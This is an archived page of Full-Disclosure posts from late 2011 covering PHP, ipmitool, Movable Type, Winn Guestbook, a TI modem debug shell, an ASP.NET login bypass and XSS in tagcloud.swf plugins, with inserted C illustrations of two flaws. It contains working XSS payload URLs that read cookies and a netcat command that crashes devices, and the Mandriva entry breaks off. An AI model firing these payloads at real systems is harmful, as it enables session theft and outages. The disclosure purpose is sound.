[Full-disclosure] [ MDVSA-2011:197 ] php

2011-12-30 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:197
 http://www.mandriva.com/security/
 ___

 Package : php
 Date: December 30, 2011
 Affected: 2010.1, 2011.
 ___

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in php:
 
 Integer overflow in the exif_process_IFD_TAG function in exif.c
 in the exif extension in PHP 5.4.0beta2 on 32-bit platforms allows
 remote attackers to read the contents of arbitrary memory locations or
 cause a denial of service via a crafted offset_val value in an EXIF
 header in a JPEG file, a different vulnerability than CVE-2011-0708
 (CVE-2011-4566).
 
 PHP before 5.3.9 computes hash values for form parameters without
 restricting the ability to trigger hash collisions predictably, which
 allows remote attackers to cause a denial of service (CPU consumption)
 by sending many crafted parameters (CVE-2011-4885).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885
 ___

 Updated Packages:

 Mandriva Linux 2010.1:

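The offset_val overflow described for CVE-2011-4566, as an added illustration that is not PHP's exif.c code: a bounds check that adds offset and length in 32-bit arithmetic wraps around, while comparing the length against the remaining space does not. Function names and the 1000-byte sample buffer are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>

/* Illustrative model of the bounds check an EXIF IFD parser must make
 * before reading `byte_count` bytes at `offset_val` inside a buffer of
 * `buf_size` bytes. Arithmetic is done in uint32_t to model the 32-bit
 * platforms named in the advisory; this is not PHP's exif.c code. */

/* Vulnerable pattern: the sum wraps modulo 2^32, so a huge offset_val
 * looks "in bounds" and the read lands outside the buffer. */
int ifd_tag_in_bounds_wrapping(uint32_t buf_size, uint32_t offset_val,
                               uint32_t byte_count)
{
    uint32_t end = offset_val + byte_count;   /* may wrap */
    return end <= buf_size;
}

/* Hardened pattern: compare against the remaining space instead of
 * forming a sum that can overflow. */
int ifd_tag_in_bounds_safe(uint32_t buf_size, uint32_t offset_val,
                           uint32_t byte_count)
{
    if (offset_val > buf_size)
        return 0;
    return byte_count <= buf_size - offset_val;
}

/* Copy a tag's payload only after the hardened check passes. Returns the
 * number of bytes copied, or -1 when the tag points outside the buffer
 * or would not fit in `out`. */
int read_ifd_tag(const unsigned char *buf, uint32_t buf_size,
                 uint32_t offset_val, uint32_t byte_count,
                 unsigned char *out, uint32_t out_size)
{
    if (byte_count > out_size ||
        !ifd_tag_in_bounds_safe(buf_size, offset_val, byte_count))
        return -1;
    for (uint32_t i = 0; i < byte_count; i++)
        out[i] = buf[offset_val + i];
    return (int)byte_count;
}

int main(void)
{
    /* constructed sample: a 1000-byte "JPEG" buffer and a tag whose
     * offset_val is chosen so offset_val + byte_count wraps to 0x10 */
    unsigned char jpeg[1000] = {0};
    unsigned char out[64];
    uint32_t offset_val = 0xFFFFFFF0u, byte_count = 0x20u;

    printf("wrapping check says in-bounds: %d\n",
           ifd_tag_in_bounds_wrapping(sizeof jpeg, offset_val, byte_count));
    printf("safe check says in-bounds:     %d\n",
           ifd_tag_in_bounds_safe(sizeof jpeg, offset_val, byte_count));
    printf("read_ifd_tag result:           %d\n",
           read_ifd_tag(jpeg, sizeof jpeg, offset_val, byte_count,
                        out, sizeof out));
    return 0;
}
```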
[Full-disclosure] [SECURITY] [DSA 2376-1] ipmitool security update

2011-12-30 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2376-1   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
December 30, 2011  http://www.debian.org/security/faq
- -

Package: ipmitool
Vulnerability  : insecure pid file
Problem type   : local
Debian-specific: no
CVE ID : CVE-2011-4339
Debian Bug : 651917

It was discovered that OpenIPMI, the Intelligent Platform Management
Interface library and tools, used too wide permissions on its PID file,
which allows local users to kill arbitrary processes by writing to
this file.

For the stable distribution (squeeze), this problem has been fixed in
version 1.8.11-2+squeeze2.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.11-5.

We recommend that you upgrade your ipmitool packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2263-2] movabletype-opensource security update

2011-12-30 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2263-2   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
December 30, 2011  http://www.debian.org/security/faq
- -

Package: movabletype-opensource
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : not yet available
Debian Bug : 627936

Advisory DSA 2363-1 did not include a package for the Debian 5.0 'Lenny'
suite at that time. This update adds that package. The original advisory
text follows.

It was discovered that Movable Type, a weblog publishing system,
contains several security vulnerabilities:

A remote attacker could execute arbitrary code in a logged-in user's
web browser.

A remote attacker could read or modify the contents in the system
under certain circumstances.

For the oldstable distribution (lenny), these problems have been fixed in
version 4.2.3-1+lenny3.

For the stable distribution (squeeze), these problems have been fixed in
version 4.3.5+dfsg-2+squeeze2.

For the testing distribution (wheezy) and for the unstable
distribution (sid), these problems have been fixed in version
4.3.6.1+dfsg-1.

We recommend that you upgrade your movabletype-opensource packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] Winn Guestbook v2.4.8c Stored XSS

2011-12-30 Thread tom
# Exploit Title: Winn Guestbook v2.4.8c Stored XSS
# Date: 12/29/11
# Author: G13
# Software Link: http://code.google.com/p/winn-guestbook/, 
http://www.winn.ws
# Version: 2.4.8c
# Category: webapps (php)
# CVE: 2011-5026

# Vulnerability #

There is no sanitization of the input of the name variable. This allows 
malicious scripts to be added. This is a stored XSS.

# Vendor Notification #

12/24/11 - Vendor Notified.
12/27/11 - Vendor Acknowledged, Patch Issued.

# Resolution #

Upgrade to Version 2.4.8d

# Affected Variables #

name=[XSS]

# Exploit #

The script can be added right in the page, there is no filtering of 
input. This can easily be exploited if the email address used is added 
to the approved posters list.



[Full-disclosure] DoS in TI Golden Gateway MXP Debug Application

2011-12-30 Thread will
###

 Will Urbanski

Application:Texas Instruments Golden Gateway MXP Debug Application
http://www.ti.com

Vuln ID:SHR20111201

Version:2007

Platforms:  Embedded (tested on SMC D3GNV Cable Modem)

Bug:input sanitization DoS vuln in `show rtcp_info`

Exploitation:   remote
Date:   01 Dec 2011
Author: Will Urbanski
e-mail: will () shakingrock com
permalink:  http://www.shakingrock.com/vulns/SHR20111201.txt


###


1) Introduction
2) `show rtcp_info`
3) Impact
4) Workaround


###

===
1) Introduction
===

From vendor's homepage:
Golden Gateway® software is designed to run on Texas Instruments (TI) Digital 
Signal Processors (DSPs). The software, which powers voice, fax and data modem 
transmission over the Internet, is inside products made by industry leaders 
such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and 
data communications equipment manufacturers. 

###

==
2) `show rtcp_info`
==

Executing `show rtcp_info 1` results in system failure due to a critical 
process being terminated. The show command is normally used to display system 
information and should not result in application termination.

$ nc 172.16.1.1 4159
Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXP> show version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXP> show rtcp_info 1
show rtcp_info 1
MXP> sigterm_prog=0;calling vp880_restart

The DoS can be initiated remotely by simply sending show rtcp_info 1 to the 
MXP shell. During some of our tests we were unable to regain internet 
connectivity until the device had been unplugged. In the event that 
connectivity is restored spamming show rtcp_info 1 to the MXP shell will 
ensure the device stays offline.


###

===
3) Impact
===

As mentioned on the vendor's site the Golden Gateway Remote Command Processor 
MXP Debug Application is included in many embedded networking devices. The 
software, which powers voice, fax and data modem transmission over the 
Internet, is inside products made by industry leaders such as Cisco Systems, 
3Com, Nortel Networks and many other leading voice and data communications 
equipment manufacturers. This remote denial of service was discovered in an 
SMC D3GNV DOCSIS 3.0 Multimedia Voice Gateway which provides voice, wifi, and 
cable internet capabilities. This vulnerability _may_ be found on any device 
that allows unauthenticated access to the MXP Debug Application shell.


###

==
4) Workaround
==

Restrict access to port tcp/4159 on devices that are allowing unauthenticated 
access to the MXP Debug Application.



[Full-disclosure] SEC Consult SA-20111230-0 :: Critical authentication bypass in Microsoft ASP.NET Forms - CVE-2011-3416

2011-12-30 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory  20111230-0 
===
  title: Microsoft ASP.NET Forms Authentication Bypass
product: Microsoft .NET Framework
 vulnerable version: Microsoft .NET Framework Version:4.0.30319; 
 ASP.NET Version:4.0.30319.237 and below
  fixed version: MS11-100
CVE: CVE-2011-3416
 impact: critical
   homepage: http://www.microsoft.com/net
  found: 2011-10-02
 by: K. Gudinavicius / SEC Consult Vulnerability Lab 
 m. / SEC Consult Vulnerability Lab
 https://www.sec-consult.com 
===

Vendor description:
---
.NET is an integral part of many applications running on Windows and
provides common functionality for those applications to run. This
download is for people who need .NET to run an application on their
computer. For developers, the .NET Framework provides a comprehensive
and consistent programming model for building applications that have
visually stunning user experiences and seamless and secure
communication.

Source: http://www.microsoft.com/net



Vulnerability overview/description:
---
The null byte termination vulnerability exists in the
CopyStringToUnAlingnedBuffer() function of the webengine4.dll library
used by the .NET framework. The unicode string length is determined
using the lstrlenW function. The lstrlenW function returns the length
of the string, in characters not including the terminating null
character. If the unicode string containing a null byte is passed, its
length is incorrectly calculated, so only characters before the null
byte are copied into the buffer.

This vulnerability can be leveraged into an authentication bypass
vulnerability. Microsoft ASP.NET membership system depends on the
FormsAuthentication.SetAuthCookie(username, false) method for certain
functionality. By exploiting this vulnerability an attacker is able to
log on as a different existing user with all the privileges of the
targeted user (e.g. admin).



Proof of concept:
-

Detailed exploit information and source code references have been
removed from this advisory.

An attacker is able to bypass authentication in certain functionality
using null bytes and log on as another user, e.g. admin.


Vulnerable / tested versions:
-
The vulnerability has been verified to exist in Microsoft .NET Framework
Version:4.0.30319; ASP.NET Version:4.0.30319.237, which was the most
recent version at the time of discovery.

More information regarding affected versions is available within the
advisory of Microsoft:
http://technet.microsoft.com/en-us/security/bulletin/ms11-100


Vendor contact timeline:

2011-10-07: Contacted vendor through sec...@microsoft.com
2011-10-07: Vendor response, MSRC 11838
2011-10-14: Contacted MSRC asking for status
2011-10-15: Answer from case manager: the vulnerability will be
addressed through a security bulletin, a timeframe is
unknown.
2011-11-23: Contacted MSRC asking for status
2011-11-23: Answer from case manager: a release date of update is
unknown, best guess would be a month before or after the
March (2012) update cycle
2011-12-29: Microsoft publishes out-of-band security patch MS11-100
which also addresses this vulnerability
2011-12-30: SEC Consult releases redacted version of advisory due to
criticality of this issue

SEC Consult will release a more detailed advisory at a later date.



Solution:
-
Immediately apply the MS11-100 patch:
http://technet.microsoft.com/en-us/security/bulletin/ms11-100


Workaround:
---
In .NET 4.0 the vulnerability can be mitigated by setting the
ticketCompatibilityMode attribute in the application or global
web.config file like this:

<system.web>
  <authentication mode="Forms">
    <forms ticketCompatibilityMode="Framework40" />
  </authentication>
</system.web>



Advisory URL:
-
https://www.sec-consult.com/en/advisories.html


~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius, J. Greil / @2011
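
The length mismatch described above, as an added illustration that is not Microsoft's webengine4.dll code: a terminator-based length (the lstrlenW behaviour) measures "admin\0xyz" as five code units, so a copy that trusts it silently yields "admin", while the checked variant compares the declared length against the data and rejects the embedded NUL. The wchar16 type, function names and sample name are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative model of the length mismatch in the advisory, not
 * Microsoft's webengine4.dll code. A managed (UTF-16) string carries its
 * own length, but a terminator-based routine such as lstrlenW stops at
 * the first NUL code unit, so "admin\0xyz" is measured as "admin". */

typedef uint16_t wchar16;   /* one UTF-16 code unit (constructed type) */

/* Behaves like lstrlenW: counts code units up to the first NUL. */
size_t terminator_length(const wchar16 *s)
{
    size_t n = 0;
    while (s[n] != 0)
        n++;
    return n;
}

/* The truncating pattern: the copy trusts the terminator, so whatever
 * follows an embedded NUL is dropped. Returns the units copied. */
size_t copy_trusting_terminator(const wchar16 *src, wchar16 *dst,
                                size_t dst_units)
{
    size_t n = terminator_length(src);
    if (n >= dst_units)
        n = dst_units - 1;
    for (size_t i = 0; i < n; i++)
        dst[i] = src[i];
    dst[n] = 0;
    return n;
}

/* Hardened pattern: the caller passes the declared length and any NUL
 * inside that range is rejected (-1) rather than silently truncated.
 * Scanning only declared_units never reads past the declared data. */
int copy_checked(const wchar16 *src, size_t declared_units, wchar16 *dst,
                 size_t dst_units)
{
    if (declared_units >= dst_units)
        return -1;                      /* would not fit with terminator */
    for (size_t i = 0; i < declared_units; i++)
        if (src[i] == 0)
            return -1;                  /* embedded NUL: lengths disagree */
    for (size_t i = 0; i < declared_units; i++)
        dst[i] = src[i];
    dst[declared_units] = 0;
    return (int)declared_units;
}

int main(void)
{
    /* constructed sample: a 9-unit user name whose 6th unit is NUL */
    const wchar16 name[] = { 'a', 'd', 'm', 'i', 'n', 0, 'x', 'y', 'z', 0 };
    wchar16 buf[32];

    printf("declared 9 units, terminator length %zu\n",
           terminator_length(name));
    printf("trusting copy kept %zu units\n",
           copy_trusting_terminator(name, buf, 32));
    printf("checked copy result: %d\n", copy_checked(name, 9, buf, 32));
    return 0;
}
```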



Re: [Full-disclosure] Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS

2011-12-30 Thread MustLive
Hello Antony!

You are welcome.

All those XSS vulnerabilities in 34 million flash files, and all those 
vulnerable plugins for different engines with a vulnerable swf-file, which 
I've written about during 2010-2011, including the last five plugins, and those 
vulnerabilities in TinyMCE (on tens of millions of web sites; on WordPress 
alone there are more than 67 million affected web sites), and all those 
vulnerabilities disclosed by me in 2011, and that new version of the plugin 
Register Plus Redux (with all holes fixed), which I wrote about in the last 
advisory - all these are my presents. So Merry Christmas and Happy New Year!

Of course I wish good music for everyone for holidays. Like this one: 
http://soundcloud.com/mustlive/mega-mix-4

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: Antony widmal
To: MustLive
Cc: submissi...@packetstormsecurity.org ; full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 27, 2011 12:44 AM
Subject: Re: [Full-disclosure] Vulnerabilities in plugins for MODx CMS, 
XOOPS, uCoz, Magento and DSP CMS


10 million XSS !


Thank you Santa.





2011/12/26 MustLive mustl...@websecurity.com.ua

Hello list!

Besides the tens of millions of vulnerable web sites with affected flash files
and the multiple vulnerable plugins for different engines, which I've written
about earlier, there are a lot of other vulnerable plugins. Here are new ones
(some of them are vulnerable to two XSS holes). There are Cross-Site
Scripting vulnerabilities in plugins for the engines MODx CMS, XOOPS, uCoz,
Magento and DSP CMS, all of which are ports of WP-Cumulus. A lot of other such
plugins for other engines can be vulnerable.

This XSS is similar to the XSS vulnerability in WP-Cumulus, which I disclosed
in 2009 (http://securityvulns.com/Wdocument842.html), because these plugins
are using tagcloud.swf made by the author of WP-Cumulus. I wrote about such
vulnerabilities in 2009-2011; in particular, I mentioned the millions of flash
files tagcloud.swf which are vulnerable to XSS attacks in my
article XSS vulnerabilities in 34 millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).

-
Affected products:
-

Vulnerable are all versions of Tagcloud for MODx CMS.

Vulnerable is Cumulus for XOOPS 1.0, which is also included in
ExtendedPackRU for XOOPS.

Vulnerable are all versions of uCoz-Cumulus for uCoz.

Vulnerable are all versions of Cumulus Tagcloud for Magento.

Vulnerable are all versions of Cumulus for DSP CMS.

Some of these plugins are vulnerable to one and some to two XSS holes: both
the first hole in WP-Cumulus, which I disclosed in 2009, and the second
hole, which I disclosed in 2011.

Besides these ones and those which I disclosed in 2009-2011, a lot of
other such plugins for other engines can be vulnerable.

--
Details:
--

XSS (WASC-08):

Tagcloud for MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus for XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus for uCoz:

http://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus Tagcloud for Magento:

http://site/frontend/tag/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml

http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Via parameters mode and xmlpath.

Cumulus for DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after a click. It's strictly social XSS
(http://websecurity.com.ua/5476/). It's also possible to conduct (like in
WP-Cumulus) an HTML Injection attack.

-
Plugins with fixed version of swf-file:
-

Because in November 2009, after I informed him, Roy Tanck (developer of
WP-Cumulus) fixed only the XSS vector, but not the HTML Injection vector, it's
still possible to conduct HTML Injection attacks (for injecting arbitrary links)
against all versions of this swf-file (which can be found under the name
tagcloud.swf and other names), including the fixed version of the swf-file
with the fixed XSS hole.

So all those plugins whose developers fixed this vulnerability (after being
informed by me, by Roy or by other people) by updating the swf-file are still
vulnerable to HTML Injection. 

[Full-disclosure] INSECT Pro - Version 3.0 Released!

2011-12-30 Thread runlvl
Great news!!! This 2012 we released the new version of INSECT PRO

INSECT Pro 3.0 - Ultimate is here! This penetration security auditing
and testing software solution is designed to allow organizations of
all sizes mitigate, monitor and manage the latest security threats
vulnerabilities and implement active security policies by performing
penetration tests across their infrastructure and applications.

Promotional price: 50 u$d!

Get your copy now! From here: http://insecurityresearch.com

http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded

Insecurity Research Team



Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!

2011-12-30 Thread Gage Bystrom
Seriously, what the fuck is wrong with you? How many times have you been
told that full disclosure is not the place for advertising your piece of
shit software?
On Dec 30, 2011 4:43 PM, runlvl run...@gmail.com wrote:

 Great news!!! This 2012 we released the new version of INSECT PRO

 INSECT Pro 3.0 - Ultimate is here! This penetration security auditing
 and testing software solution is designed to allow organizations of
 all sizes mitigate, monitor and manage the latest security threats
 vulnerabilities and implement active security policies by performing
 penetration tests across their infrastructure and applications.

 Promotional price: 50 u$d!

 Get your copy now! From here: http://insecurityresearch.com

 http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded

 Insecurity Research Team



Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!

2011-12-30 Thread root
The presentation video is actually quite nice. Maybe you should
diversify your business into graphical design.

On 12/30/2011 09:37 PM, runlvl wrote:
 Great news!!! This 2012 we released the new version of INSECT PRO
 
 INSECT Pro 3.0 - Ultimate is here! This penetration security auditing
 and testing software solution is designed to allow organizations of
 all sizes mitigate, monitor and manage the latest security threats
 vulnerabilities and implement active security policies by performing
 penetration tests across their infrastructure and applications.
 
 Promotional price: 50 u$d!
 
 Get your copy now! From here: http://insecurityresearch.com
 
 http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded
 
 Insecurity Research Team
 
 
